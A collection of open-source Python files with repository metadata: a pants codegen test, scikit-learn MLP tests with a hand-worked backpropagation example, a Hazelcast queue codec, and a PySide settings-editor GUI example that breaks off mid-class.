build_path = os.path.join(task.workdir,
'scala_record',
'org',
'pantsbuild',
'example')
java_exists = os.path.isfile(os.path.join(build_path, 'java_a.java'))
scala_exists = os.path.isfile(os.path.join(build_path, 'a.scala'))
self.assertTrue(java_exists)
self.assertTrue(scala_exists)
|
digwanderlust/pants
|
contrib/spindle/tests/python/pants_test/contrib/spindle/tasks/test_spindle_gen.py
|
Python
|
apache-2.0
| 2,368
|
"""
Testing for Multi-layer Perceptron module (sklearn.neural_network)
"""
# Author: Issam H. Laradji
# License: BSD 3 clause
import sys
import warnings
import numpy as np
from numpy.testing import assert_almost_equal, assert_array_equal
from sklearn.datasets import load_digits, load_boston, load_iris
from sklearn.datasets import make_regression, make_multilabel_classification
from sklearn.exceptions import ConvergenceWarning
from sklearn.externals.six.moves import cStringIO as StringIO
from sklearn.metrics import roc_auc_score
from sklearn.neural_network import MLPClassifier
from sklearn.neural_network import MLPRegressor
from sklearn.preprocessing import LabelBinarizer
from sklearn.preprocessing import StandardScaler, MinMaxScaler
from scipy.sparse import csr_matrix
from sklearn.utils.testing import (assert_raises, assert_greater, assert_equal,
assert_false, ignore_warnings)
from sklearn.utils.testing import assert_raise_message
np.seterr(all='warn')
ACTIVATION_TYPES = ["identity", "logistic", "tanh", "relu"]
digits_dataset_multi = load_digits(n_class=3)
X_digits_multi = MinMaxScaler().fit_transform(digits_dataset_multi.data[:200])
y_digits_multi = digits_dataset_multi.target[:200]
digits_dataset_binary = load_digits(n_class=2)
X_digits_binary = MinMaxScaler().fit_transform(
digits_dataset_binary.data[:200])
y_digits_binary = digits_dataset_binary.target[:200]
classification_datasets = [(X_digits_multi, y_digits_multi),
(X_digits_binary, y_digits_binary)]
boston = load_boston()
Xboston = StandardScaler().fit_transform(boston.data)[: 200]
yboston = boston.target[:200]
iris = load_iris()
X_iris = iris.data
y_iris = iris.target
def test_alpha():
# Test that larger alpha yields weights closer to zero
X = X_digits_binary[:100]
y = y_digits_binary[:100]
alpha_vectors = []
alpha_values = np.arange(2)
absolute_sum = lambda x: np.sum(np.abs(x))
for alpha in alpha_values:
mlp = MLPClassifier(hidden_layer_sizes=10, alpha=alpha, random_state=1)
with ignore_warnings(category=ConvergenceWarning):
mlp.fit(X, y)
alpha_vectors.append(np.array([absolute_sum(mlp.coefs_[0]),
absolute_sum(mlp.coefs_[1])]))
for i in range(len(alpha_values) - 1):
assert (alpha_vectors[i] > alpha_vectors[i + 1]).all()
def test_fit():
# Test that the algorithm solution is equal to a worked out example.
X = np.array([[0.6, 0.8, 0.7]])
y = np.array([0])
mlp = MLPClassifier(solver='sgd', learning_rate_init=0.1, alpha=0.1,
activation='logistic', random_state=1, max_iter=1,
hidden_layer_sizes=2, momentum=0)
# set weights
mlp.coefs_ = [0] * 2
mlp.intercepts_ = [0] * 2
mlp.n_outputs_ = 1
mlp.coefs_[0] = np.array([[0.1, 0.2], [0.3, 0.1], [0.5, 0]])
mlp.coefs_[1] = np.array([[0.1], [0.2]])
mlp.intercepts_[0] = np.array([0.1, 0.1])
mlp.intercepts_[1] = np.array([1.0])
mlp._coef_grads = [] * 2
mlp._intercept_grads = [] * 2
# Initialize parameters
mlp.n_iter_ = 0
mlp.learning_rate_ = 0.1
# Compute the number of layers
mlp.n_layers_ = 3
# Pre-allocate gradient matrices
mlp._coef_grads = [0] * (mlp.n_layers_ - 1)
mlp._intercept_grads = [0] * (mlp.n_layers_ - 1)
mlp.out_activation_ = 'logistic'
mlp.t_ = 0
mlp.best_loss_ = np.inf
mlp.loss_curve_ = []
mlp._no_improvement_count = 0
mlp._intercept_velocity = [np.zeros_like(intercepts) for
intercepts in
mlp.intercepts_]
mlp._coef_velocity = [np.zeros_like(coefs) for coefs in
mlp.coefs_]
mlp.partial_fit(X, y, classes=[0, 1])
# Manually worked out example
# h1 = g(X1 * W_i1 + b11) = g(0.6 * 0.1 + 0.8 * 0.3 + 0.7 * 0.5 + 0.1)
# = 0.679178699175393
# h2 = g(X2 * W_i2 + b12) = g(0.6 * 0.2 + 0.8 * 0.1 + 0.7 * 0 + 0.1)
# = 0.574442516811659
# o1 = g(h * W2 + b21) = g(0.679 * 0.1 + 0.574 * 0.2 + 1)
# = 0.7654329236196236
# d21 = -(0 - 0.765) = 0.765
# d11 = (1 - 0.679) * 0.679 * 0.765 * 0.1 = 0.01667
# d12 = (1 - 0.574) * 0.574 * 0.765 * 0.2 = 0.0374
# W1grad11 = X1 * d11 + alpha * W11 = 0.6 * 0.01667 + 0.1 * 0.1 = 0.0200
# W1grad11 = X1 * d12 + alpha * W12 = 0.6 * 0.0374 + 0.1 * 0.2 = 0.04244
# W1grad21 = X2 * d11 + alpha * W13 = 0.8 * 0.01667 + 0.1 * 0.3 = 0.043336
# W1grad22 = X2 * d12 + alpha * W14 = 0.8 * 0.0374 + 0.1 * 0.1 = 0.03992
# W1grad31 = X3 * d11 + alpha * W15 = 0.6 * 0.01667 + 0.1 * 0.5 = 0.060002
# W1grad32 = X3 * d12 + alpha * W16 = 0.6 * 0.0374 + 0.1 * 0 = 0.02244
# W2grad1 = h1 * d21 + alpha * W21 = 0.679 * 0.765 + 0.1 * 0.1 = 0.5294
# W2grad2 = h2 * d21 + alpha * W22 = 0.574 * 0.765 + 0.1 * 0.2 = 0.45911
# b1grad1 = d11 = 0.01667
# b1grad2 = d12 = 0.0374
# b2grad = d21 = 0.765
# W1 = W1 - eta * [W1grad11, .., W1grad32] = [[0.1, 0.2], [0.3, 0.1],
# [0.5, 0]] - 0.1 * [[0.0200, 0.04244], [0.043336, 0.03992],
# [0.060002, 0.02244]] = [[0.098, 0.195756], [0.2956664,
# 0.096008], [0.4939998, -0.002244]]
# W2 = W2 - eta * [W2grad1, W2grad2] = [[0.1], [0.2]] - 0.1 *
# [[0.5294], [0.45911]] = [[0.04706], [0.154089]]
# b1 = b1 - eta * [b1grad1, b1grad2] = 0.1 - 0.1 * [0.01667, 0.0374]
# = [0.098333, 0.09626]
# b2 = b2 - eta * b2grad = 1.0 - 0.1 * 0.765 = 0.9235
assert_almost_equal(mlp.coefs_[0], np.array([[0.098, 0.195756],
[0.2956664, 0.096008],
[0.4939998, -0.002244]]),
decimal=3)
assert_almost_equal(mlp.coefs_[1], np.array([[0.04706], [0.154089]]),
decimal=3)
assert_almost_equal(mlp.intercepts_[0],
np.array([0.098333, 0.09626]), decimal=3)
assert_almost_equal(mlp.intercepts_[1], np.array(0.9235), decimal=3)
# Testing output
# h1 = g(X1 * W_i1 + b11) = g(0.6 * 0.098 + 0.8 * 0.2956664 +
# 0.7 * 0.4939998 + 0.098333) = 0.677
# h2 = g(X2 * W_i2 + b12) = g(0.6 * 0.195756 + 0.8 * 0.096008 +
# 0.7 * -0.002244 + 0.09626) = 0.572
# o1 = h * W2 + b21 = 0.677 * 0.04706 +
# 0.572 * 0.154089 + 0.9235 = 1.043
# prob = sigmoid(o1) = 0.739
assert_almost_equal(mlp.predict_proba(X)[0, 1], 0.739, decimal=3)
def test_gradient():
# Test gradient.
# This makes sure that the activation functions and their derivatives
# are correct. The numerical and analytical computation of the gradient
# should be close.
for n_labels in [2, 3]:
n_samples = 5
n_features = 10
X = np.random.random((n_samples, n_features))
y = 1 + np.mod(np.arange(n_samples) + 1, n_labels)
Y = LabelBinarizer().fit_transform(y)
for activation in ACTIVATION_TYPES:
mlp = MLPClassifier(activation=activation, hidden_layer_sizes=10,
solver='lbfgs', alpha=1e-5,
learning_rate_init=0.2, max_iter=1,
random_state=1)
mlp.fit(X, y)
theta = np.hstack([l.ravel() for l in mlp.coefs_ +
mlp.intercepts_])
layer_units = ([X.shape[1]] + [mlp.hidden_layer_sizes] +
[mlp.n_outputs_])
activations = []
deltas = []
coef_grads = []
intercept_grads = []
activations.append(X)
for i in range(mlp.n_layers_ - 1):
activations.append(np.empty((X.shape[0],
layer_units[i + 1])))
deltas.append(np.empty((X.shape[0],
layer_units[i + 1])))
fan_in = layer_units[i]
fan_out = layer_units[i + 1]
coef_grads.append(np.empty((fan_in, fan_out)))
intercept_grads.append(np.empty(fan_out))
# analytically compute the gradients
def loss_grad_fun(t):
return mlp._loss_grad_lbfgs(t, X, Y, activations, deltas,
coef_grads, intercept_grads)
[value, grad] = loss_grad_fun(theta)
numgrad = np.zeros(np.size(theta))
n = np.size(theta, 0)
E = np.eye(n)
epsilon = 1e-5
# numerically compute the gradients
for i in range(n):
dtheta = E[:, i] * epsilon
numgrad[i] = ((loss_grad_fun(theta + dtheta)[0] -
loss_grad_fun(theta - dtheta)[0]) /
(epsilon * 2.0))
assert_almost_equal(numgrad, grad)
def test_lbfgs_classification():
# Test lbfgs on classification.
# It should achieve a score higher than 0.95 for the binary and multi-class
# versions of the digits dataset.
for X, y in classification_datasets:
X_train = X[:150]
y_train = y[:150]
X_test = X[150:]
expected_shape_dtype = (X_test.shape[0], y_train.dtype.kind)
for activation in ACTIVATION_TYPES:
mlp = MLPClassifier(solver='lbfgs', hidden_layer_sizes=50,
max_iter=150, shuffle=True, random_state=1,
activation=activation)
mlp.fit(X_train, y_train)
y_predict = mlp.predict(X_test)
assert_greater(mlp.score(X_train, y_train), 0.95)
assert_equal((y_predict.shape[0], y_predict.dtype.kind),
expected_shape_dtype)
def test_lbfgs_regression():
# Test lbfgs on the boston dataset, a regression problems.
X = Xboston
y = yboston
for activation in ACTIVATION_TYPES:
mlp = MLPRegressor(solver='lbfgs', hidden_layer_sizes=50,
max_iter=150, shuffle=True, random_state=1,
activation=activation)
mlp.fit(X, y)
if activation == 'identity':
assert_greater(mlp.score(X, y), 0.84)
else:
# Non linear models perform much better than linear bottleneck:
assert_greater(mlp.score(X, y), 0.95)
def test_learning_rate_warmstart():
# Tests that warm_start reuse past solutions.
X = [[3, 2], [1, 6], [5, 6], [-2, -4]]
y = [1, 1, 1, 0]
for learning_rate in ["invscaling", "constant"]:
mlp = MLPClassifier(solver='sgd', hidden_layer_sizes=4,
learning_rate=learning_rate, max_iter=1,
power_t=0.25, warm_start=True)
with ignore_warnings(category=ConvergenceWarning):
mlp.fit(X, y)
prev_eta = mlp._optimizer.learning_rate
mlp.fit(X, y)
post_eta = mlp._optimizer.learning_rate
if learning_rate == 'constant':
assert_equal(prev_eta, post_eta)
elif learning_rate == 'invscaling':
assert_equal(mlp.learning_rate_init / pow(8 + 1, mlp.power_t),
post_eta)
def test_multilabel_classification():
# Test that multi-label classification works as expected.
# test fit method
X, y = make_multilabel_classification(n_samples=50, random_state=0,
return_indicator=True)
mlp = MLPClassifier(solver='lbfgs', hidden_layer_sizes=50, alpha=1e-5,
max_iter=150, random_state=0, activation='logistic',
learning_rate_init=0.2)
mlp.fit(X, y)
assert_equal(mlp.score(X, y), 1)
# test partial fit method
mlp = MLPClassifier(solver='sgd', hidden_layer_sizes=50, max_iter=150,
random_state=0, activation='logistic', alpha=1e-5,
learning_rate_init=0.2)
for i in range(100):
mlp.partial_fit(X, y, classes=[0, 1, 2, 3, 4])
assert_greater(mlp.score(X, y), 0.9)
def test_multioutput_regression():
# Test that multi-output regression works as expected
X, y = make_regression(n_samples=200, n_targets=5)
mlp = MLPRegressor(solver='lbfgs', hidden_layer_sizes=50, max_iter=200,
random_state=1)
mlp.fit(X, y)
assert_greater(mlp.score(X, y), 0.9)
def test_partial_fit_classes_error():
# Tests that passing different classes to partial_fit raises an error
X = [[3, 2]]
y = [0]
clf = MLPClassifier(solver='sgd')
clf.partial_fit(X, y, classes=[0, 1])
assert_raises(ValueError, clf.partial_fit, X, y, classes=[1, 2])
def test_partial_fit_classification():
# Test partial_fit on classification.
# `partial_fit` should yield the same results as 'fit' for binary and
# multi-class classification.
for X, y in classification_datasets:
X = X
y = y
mlp = MLPClassifier(solver='sgd', max_iter=100, random_state=1,
tol=0, alpha=1e-5, learning_rate_init=0.2)
with ignore_warnings(category=ConvergenceWarning):
mlp.fit(X, y)
pred1 = mlp.predict(X)
mlp = MLPClassifier(solver='sgd', random_state=1, alpha=1e-5,
learning_rate_init=0.2)
for i in range(100):
mlp.partial_fit(X, y, classes=np.unique(y))
pred2 = mlp.predict(X)
assert_array_equal(pred1, pred2)
assert_greater(mlp.score(X, y), 0.95)
def test_partial_fit_unseen_classes():
# Non regression test for bug 6994
# Tests for labeling errors in partial fit
clf = MLPClassifier(random_state=0)
clf.partial_fit([[1], [2], [3]], ["a", "b", "c"],
classes=["a", "b", "c", "d"])
clf.partial_fit([[4]], ["d"])
assert_greater(clf.score([[1], [2], [3], [4]], ["a", "b", "c", "d"]), 0)
def test_partial_fit_regression():
# Test partial_fit on regression.
# `partial_fit` should yield the same results as 'fit' for regression.
X = Xboston
y = yboston
for momentum in [0, .9]:
mlp = MLPRegressor(solver='sgd', max_iter=100, activation='relu',
random_state=1, learning_rate_init=0.01,
batch_size=X.shape[0], momentum=momentum)
with warnings.catch_warnings(record=True):
# catch convergence warning
mlp.fit(X, y)
pred1 = mlp.predict(X)
mlp = MLPRegressor(solver='sgd', activation='relu',
learning_rate_init=0.01, random_state=1,
batch_size=X.shape[0], momentum=momentum)
for i in range(100):
mlp.partial_fit(X, y)
pred2 = mlp.predict(X)
assert_almost_equal(pred1, pred2, decimal=2)
score = mlp.score(X, y)
assert_greater(score, 0.75)
def test_partial_fit_errors():
# Test partial_fit error handling.
X = [[3, 2], [1, 6]]
y = [1, 0]
# no classes passed
assert_raises(ValueError,
MLPClassifier(solver='sgd').partial_fit, X, y, classes=[2])
# lbfgs doesn't support partial_fit
assert_false(hasattr(MLPClassifier(solver='lbfgs'), 'partial_fit'))
def test_params_errors():
# Test that invalid parameters raise value error
X = [[3, 2], [1, 6]]
y = [1, 0]
clf = MLPClassifier
assert_raises(ValueError, clf(hidden_layer_sizes=-1).fit, X, y)
assert_raises(ValueError, clf(max_iter=-1).fit, X, y)
assert_raises(ValueError, clf(shuffle='true').fit, X, y)
assert_raises(ValueError, clf(alpha=-1).fit, X, y)
assert_raises(ValueError, clf(learning_rate_init=-1).fit, X, y)
assert_raises(ValueError, clf(momentum=2).fit, X, y)
assert_raises(ValueError, clf(momentum=-0.5).fit, X, y)
assert_raises(ValueError, clf(nesterovs_momentum='invalid').fit, X, y)
assert_raises(ValueError, clf(early_stopping='invalid').fit, X, y)
assert_raises(ValueError, clf(validation_fraction=1).fit, X, y)
assert_raises(ValueError, clf(validation_fraction=-0.5).fit, X, y)
assert_raises(ValueError, clf(beta_1=1).fit, X, y)
assert_raises(ValueError, clf(beta_1=-0.5).fit, X, y)
assert_raises(ValueError, clf(beta_2=1).fit, X, y)
assert_raises(ValueError, clf(beta_2=-0.5).fit, X, y)
assert_raises(ValueError, clf(epsilon=-0.5).fit, X, y)
assert_raises(ValueError, clf(solver='hadoken').fit, X, y)
assert_raises(ValueError, clf(learning_rate='converge').fit, X, y)
assert_raises(ValueError, clf(activation='cloak').fit, X, y)
def test_predict_proba_binary():
# Test that predict_proba works as expected for binary class.
X = X_digits_binary[:50]
y = y_digits_binary[:50]
clf = MLPClassifier(hidden_layer_sizes=5)
with ignore_warnings(category=ConvergenceWarning):
clf.fit(X, y)
y_proba = clf.predict_proba(X)
y_log_proba = clf.predict_log_proba(X)
(n_samples, n_classes) = y.shape[0], 2
proba_max = y_proba.argmax(axis=1)
proba_log_max = y_log_proba.argmax(axis=1)
assert_equal(y_proba.shape, (n_samples, n_classes))
assert_array_equal(proba_max, proba_log_max)
assert_array_equal(y_log_proba, np.log(y_proba))
assert_equal(roc_auc_score(y, y_proba[:, 1]), 1.0)
def test_predict_proba_multiclass():
# Test that predict_proba works as expected for multi class.
X = X_digits_multi[:10]
y = y_digits_multi[:10]
clf = MLPClassifier(hidden_layer_sizes=5)
with ignore_warnings(category=ConvergenceWarning):
clf.fit(X, y)
y_proba = clf.predict_proba(X)
y_log_proba = clf.predict_log_proba(X)
(n_samples, n_classes) = y.shape[0], np.unique(y).size
proba_max = y_proba.argmax(axis=1)
proba_log_max = y_log_proba.argmax(axis=1)
assert_equal(y_proba.shape, (n_samples, n_classes))
assert_array_equal(proba_max, proba_log_max)
assert_array_equal(y_log_proba, np.log(y_proba))
def test_predict_proba_multilabel():
# Test that predict_proba works as expected for multilabel.
# Multilabel should not use softmax which makes probabilities sum to 1
X, Y = make_multilabel_classification(n_samples=50, random_state=0,
return_indicator=True)
n_samples, n_classes = Y.shape
clf = MLPClassifier(solver='lbfgs', hidden_layer_sizes=30,
random_state=0)
clf.fit(X, Y)
y_proba = clf.predict_proba(X)
assert_equal(y_proba.shape, (n_samples, n_classes))
assert_array_equal(y_proba > 0.5, Y)
y_log_proba = clf.predict_log_proba(X)
proba_max = y_proba.argmax(axis=1)
proba_log_max = y_log_proba.argmax(axis=1)
assert_greater((y_proba.sum(1) - 1).dot(y_proba.sum(1) - 1), 1e-10)
assert_array_equal(proba_max, proba_log_max)
assert_array_equal(y_log_proba, np.log(y_proba))
def test_sparse_matrices():
# Test that sparse and dense input matrices output the same results.
X = X_digits_binary[:50]
y = y_digits_binary[:50]
X_sparse = csr_matrix(X)
mlp = MLPClassifier(solver='lbfgs', hidden_layer_sizes=15,
random_state=1)
mlp.fit(X, y)
pred1 = mlp.predict(X)
mlp.fit(X_sparse, y)
pred2 = mlp.predict(X_sparse)
assert_almost_equal(pred1, pred2)
pred1 = mlp.predict(X)
pred2 = mlp.predict(X_sparse)
assert_array_equal(pred1, pred2)
def test_tolerance():
# Test tolerance.
# It should force the solver to exit the loop when it converges.
X = [[3, 2], [1, 6]]
y = [1, 0]
clf = MLPClassifier(tol=0.5, max_iter=3000, solver='sgd')
clf.fit(X, y)
assert_greater(clf.max_iter, clf.n_iter_)
def test_verbose_sgd():
# Test verbose.
X = [[3, 2], [1, 6]]
y = [1, 0]
clf = MLPClassifier(solver='sgd', max_iter=2, verbose=10,
hidden_layer_sizes=2)
old_stdout = sys.stdout
sys.stdout = output = StringIO()
with ignore_warnings(category=ConvergenceWarning):
clf.fit(X, y)
clf.partial_fit(X, y)
sys.stdout = old_stdout
assert 'Iteration' in output.getvalue()
def test_early_stopping():
X = X_digits_binary[:100]
y = y_digits_binary[:100]
tol = 0.2
clf = MLPClassifier(tol=tol, max_iter=3000, solver='sgd',
early_stopping=True)
clf.fit(X, y)
assert_greater(clf.max_iter, clf.n_iter_)
valid_scores = clf.validation_scores_
best_valid_score = clf.best_validation_score_
assert_equal(max(valid_scores), best_valid_score)
assert_greater(best_valid_score + tol, valid_scores[-2])
assert_greater(best_valid_score + tol, valid_scores[-1])
def test_adaptive_learning_rate():
X = [[3, 2], [1, 6]]
y = [1, 0]
clf = MLPClassifier(tol=0.5, max_iter=3000, solver='sgd',
learning_rate='adaptive')
clf.fit(X, y)
assert_greater(clf.max_iter, clf.n_iter_)
assert_greater(1e-6, clf._optimizer.learning_rate)
@ignore_warnings(category=RuntimeWarning)
def test_warm_start():
X = X_iris
y = y_iris
y_2classes = np.array([0] * 75 + [1] * 75)
y_3classes = np.array([0] * 40 + [1] * 40 + [2] * 70)
y_3classes_alt = np.array([0] * 50 + [1] * 50 + [3] * 50)
y_4classes = np.array([0] * 37 + [1] * 37 + [2] * 38 + [3] * 38)
y_5classes = np.array([0] * 30 + [1] * 30 + [2] * 30 + [3] * 30 + [4] * 30)
# No error raised
clf = MLPClassifier(hidden_layer_sizes=2, solver='lbfgs',
warm_start=True).fit(X, y)
clf.fit(X, y)
clf.fit(X, y_3classes)
for y_i in (y_2classes, y_3classes_alt, y_4classes, y_5classes):
clf = MLPClassifier(hidden_layer_sizes=2, solver='lbfgs',
warm_start=True).fit(X, y)
message = ('warm_start can only be used where `y` has the same '
'classes as in the previous call to fit.'
' Previously got [0 1 2], `y` has %s' % np.unique(y_i))
assert_raise_message(ValueError, message, clf.fit, X, y_i)
|
mbayon/TFG-MachineLearning
|
venv/lib/python3.6/site-packages/sklearn/neural_network/tests/test_mlp.py
|
Python
|
mit
| 22,194
|
from hazelcast.serialization.bits import *
from hazelcast.protocol.client_message import ClientMessage
from hazelcast.protocol.custom_codec import *
from hazelcast.util import ImmutableLazyDataList
from hazelcast.protocol.codec.queue_message_type import *
REQUEST_TYPE = QUEUE_ISEMPTY
RESPONSE_TYPE = 101
RETRYABLE = False
def calculate_size(name):
""" Calculates the request payload size"""
data_size = 0
data_size += calculate_size_str(name)
return data_size
def encode_request(name):
""" Encode request into client_message"""
client_message = ClientMessage(payload_size=calculate_size(name))
client_message.set_message_type(REQUEST_TYPE)
client_message.set_retryable(RETRYABLE)
client_message.append_str(name)
client_message.update_frame_length()
return client_message
def decode_response(client_message, to_object=None):
""" Decode response from client message"""
parameters = dict(response=None)
parameters['response'] = client_message.read_bool()
return parameters
|
cangencer/hazelcast-python-client
|
hazelcast/protocol/codec/queue_is_empty_codec.py
|
Python
|
apache-2.0
| 1,041
|
#!/usr/bin/env python
"""PyQt4 port of the tools/settingseditor example from Qt v4.x"""
import sys
from PySide import QtCore, QtGui
class MainWindow(QtGui.QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.settingsTree = SettingsTree()
self.setCentralWidget(self.settingsTree)
self.locationDialog = None
self.createActions()
self.createMenus()
self.autoRefreshAct.setChecked(True)
self.fallbacksAct.setChecked(True)
self.setWindowTitle("Settings Editor")
self.resize(500, 600)
def openSettings(self):
if self.locationDialog is None:
self.locationDialog = LocationDialog(self)
if self.locationDialog.exec_():
settings = QtCore.QSettings(self.locationDialog.format(),
self.locationDialog.scope(),
self.locationDialog.organization(),
self.locationDialog.application())
self.setSettingsObject(settings)
self.fallbacksAct.setEnabled(True)
def openIniFile(self):
fileName, _ = QtGui.QFileDialog.getOpenFileName(self, "Open INI File",
'', "INI Files (*.ini *.conf)")
if fileName:
settings = QtCore.QSettings(fileName, QtCore.QSettings.IniFormat)
self.setSettingsObject(settings)
self.fallbacksAct.setEnabled(False)
def openPropertyList(self):
fileName, _ = QtGui.QFileDialog.getOpenFileName(self,
"Open Property List", '', "Property List Files (*.plist)")
if fileName:
settings = QtCore.QSettings(fileName, QtCore.QSettings.NativeFormat)
self.setSettingsObject(settings)
self.fallbacksAct.setEnabled(False)
def openRegistryPath(self):
path, ok = QtGui.QInputDialog.getText(self, "Open Registry Path",
"Enter the path in the Windows registry:",
QtGui.QLineEdit.Normal, 'HKEY_CURRENT_USER\\')
if ok and path != '':
settings = QtCore.QSettings(path, QtCore.QSettings.NativeFormat)
self.setSettingsObject(settings)
self.fallbacksAct.setEnabled(False)
def about(self):
QtGui.QMessageBox.about(self, "About Settings Editor",
"The <b>Settings Editor</b> example shows how to access "
"application settings using Qt.")
def createActions(self):
self.openSettingsAct = QtGui.QAction("&Open Application Settings...",
self, shortcut="Ctrl+O", triggered=self.openSettings)
self.openIniFileAct = QtGui.QAction("Open I&NI File...", self,
shortcut="Ctrl+N", triggered=self.openIniFile)
self.openPropertyListAct = QtGui.QAction("Open Mac &Property List...",
self, shortcut="Ctrl+P", triggered=self.openPropertyList)
if sys.platform != 'darwin':
self.openPropertyListAct.setEnabled(False)
self.openRegistryPathAct = QtGui.QAction(
"Open Windows &Registry Path...", self, shortcut="Ctrl+G",
triggered=self.openRegistryPath)
if sys.platform != 'win32':
self.openRegistryPathAct.setEnabled(False)
self.refreshAct = QtGui.QAction("&Refresh", self, shortcut="Ctrl+R",
enabled=False, triggered=self.settingsTree.refresh)
self.exitAct = QtGui.QAction("E&xit", self, shortcut="Ctrl+Q",
triggered=self.close)
self.autoRefreshAct = QtGui.QAction("&Auto-Refresh", self,
shortcut="Ctrl+A", checkable=True, enabled=False)
self.autoRefreshAct.triggered[bool].connect(self.settingsTree.setAutoRefresh)
self.autoRefreshAct.triggered[bool].connect(self.refreshAct.setDisabled)
self.fallbacksAct = QtGui.QAction("&Fallbacks", self,
shortcut="Ctrl+F", checkable=True, enabled=False)
self.fallbacksAct.triggered[bool].connect(self.settingsTree.setFallbacksEnabled)
self.aboutAct = QtGui.QAction("&About", self, triggered=self.about)
self.aboutQtAct = QtGui.QAction("About &Qt", self,
triggered=QtGui.qApp.aboutQt)
def createMenus(self):
self.fileMenu = self.menuBar().addMenu("&File")
self.fileMenu.addAction(self.openSettingsAct)
self.fileMenu.addAction(self.openIniFileAct)
self.fileMenu.addAction(self.openPropertyListAct)
self.fileMenu.addAction(self.openRegistryPathAct)
self.fileMenu.addSeparator()
self.fileMenu.addAction(self.refreshAct)
self.fileMenu.addSeparator()
self.fileMenu.addAction(self.exitAct)
self.optionsMenu = self.menuBar().addMenu("&Options")
self.optionsMenu.addAction(self.autoRefreshAct)
self.optionsMenu.addAction(self.fallbacksAct)
self.menuBar().addSeparator()
self.helpMenu = self.menuBar().addMenu("&Help")
self.helpMenu.addAction(self.aboutAct)
self.helpMenu.addAction(self.aboutQtAct)
def setSettingsObject(self, settings):
settings.setFallbacksEnabled(self.fallbacksAct.isChecked())
self.settingsTree.setSettingsObject(settings)
self.refreshAct.setEnabled(True)
self.autoRefreshAct.setEnabled(True)
niceName = settings.fileName()
niceName.replace('\\', '/')
niceName = niceName.split('/')[-1]
if not settings.isWritable():
niceName += " (read only)"
self.setWindowTitle("%s - Settings Editor" % niceName)
class LocationDialog(QtGui.QDialog):
def __init__(self, parent=None):
super(LocationDialog, self).__init__(parent)
self.formatComboBox = QtGui.QComboBox()
self.formatComboBox.addItem("Native")
self.formatComboBox.addItem("INI")
self.scopeComboBox = QtGui.QComboBox()
self.scopeComboBox.addItem("User")
self.scopeComboBox.addItem("System")
self.organizationComboBox = QtGui.QComboBox()
self.organizationComboBox.addItem("Trolltech")
self.organizationComboBox.setEditable(True)
self.applicationComboBox = QtGui.QComboBox()
self.applicationComboBox.addItem("Any")
self.applicationComboBox.addItem("Application Example")
self.applicationComboBox.addItem("Assistant")
self.applicationComboBox.addItem("Designer")
self.applicationComboBox.addItem("Linguist")
self.applicationComboBox.setEditable(True)
self.applicationComboBox.setCurrentIndex(3)
formatLabel = QtGui.QLabel("&Format:")
formatLabel.setBuddy(self.formatComboBox)
scopeLabel = QtGui.QLabel("&Scope:")
scopeLabel.setBuddy(self.scopeComboBox)
organizationLabel = QtGui.QLabel("&Organization:")
organizationLabel.setBuddy(self.organizationComboBox)
applicationLabel = QtGui.QLabel("&Application:")
applicationLabel.setBuddy(self.applicationComboBox)
self.locationsGroupBox = QtGui.QGroupBox("Setting Locations")
self.locationsTable = QtGui.QTableWidget()
self.locationsTable.setSelectionMode(QtGui.QAbstractItemView.SingleSelection)
self.locationsTable.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
self.locationsTable.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers)
self.locationsTable.setColumnCount(2)
self.locationsTable.setHorizontalHeaderLabels(("Location", "Access"))
self.locationsTable.horizontalHeader().setResizeMode(0, QtGui.QHeaderView.Stretch)
self.locationsTable.horizontalHeader().resizeSection(1, 180)
self.buttonBox = QtGui.QDialogButtonBox(QtGui.QDialogButtonBox.Ok | QtGui.QDialogButtonBox.Cancel)
self.formatComboBox.activated.connect(self.updateLocationsTable)
self.scopeComboBox.activated.connect(self.updateLocationsTable)
self.organizationComboBox.lineEdit().editingFinished.connect(self.updateLocationsTable)
self.applicationComboBox.lineEdit().editingFinished.connect(self.updateLocationsTable)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
locationsLayout = QtGui.QVBoxLayout()
locationsLayout.addWidget(self.locationsTable)
self.locationsGroupBox.setLayout(locationsLayout)
mainLayout = QtGui.QGridLayout()
mainLayout.addWidget(formatLabel, 0, 0)
mainLayout.addWidget(self.formatComboBox, 0, 1)
mainLayout.addWidget(scopeLabel, 1, 0)
mainLayout.addWidget(self.scopeComboBox, 1, 1)
mainLayout.addWidget(organizationLabel, 2, 0)
mainLayout.addWidget(self.organizationComboBox, 2, 1)
mainLayout.addWidget(applicationLabel, 3, 0)
mainLayout.addWidget(self.applicationComboBox, 3, 1)
mainLayout.addWidget(self.locationsGroupBox, 4, 0, 1, 2)
mainLayout.addWidget(self.buttonBox, 5, 0, 1, 2)
self.setLayout(mainLayout)
self.updateLocationsTable()
self.setWindowTitle("Open Application Settings")
self.resize(650, 400)
def format(self):
if self.formatComboBox.currentIndex() == 0:
return QtCore.QSettings.NativeFormat
else:
return QtCore.QSettings.IniFormat
def scope(self):
if self.scopeComboBox.currentIndex() == 0:
return QtCore.QSettings.UserScope
else:
return QtCore.QSettings.SystemScope
def organization(self):
return self.organizationComboBox.currentText()
def application(self):
if self.applicationComboBox.currentText() == "Any":
return ''
return self.applicationComboBox.currentText()
def updateLocationsTable(self):
self.locationsTable.setUpdatesEnabled(False)
self.locationsTable.setRowCount(0)
for i in range(2):
if i == 0:
if self.scope() == QtCore.QSettings.SystemScope:
continue
actualScope = QtCore.QSettings.UserScope
else:
actualScope = QtCore.QSettings.SystemScope
for j in range(2):
if j == 0:
if not self.application():
continue
actualApplication = self.application()
else:
actualApplication = ''
settings = QtCore.QSettings(self.format(), actualScope,
self.organization(), actualApplication)
row = self.locationsTable.rowCount()
self.locationsTable.setRowCount(row + 1)
item0 = QtGui.QTableWidgetItem()
item0.setText(settings.fileName())
item1 = QtGui.QTableWidgetItem()
disable = not (settings.childKeys() or settings.childGroups())
if row == 0:
if settings.isWritable():
item1.setText("Read-write")
disable = False
else:
item1.setText("Read-only")
self.buttonBox.button(QtGui.QDialogButtonBox.Ok).setDisabled(disable)
else:
item1.setText("Read-only fallback")
if disable:
item0.setFlags(item0.flags() & ~QtCore.Qt.ItemIsEnabled)
item1.setFlags(item1.flags() & ~QtCore.Qt.ItemIsEnabled)
self.locationsTable.setItem(row, 0, item0)
self.locationsTable.setItem(row, 1, item1)
self.locationsTable.setUpdatesEnabled(True)
class SettingsTree(QtGui.QTreeWidget):
def __init__(self, parent=None):
super(SettingsTree, self).__init__(parent)
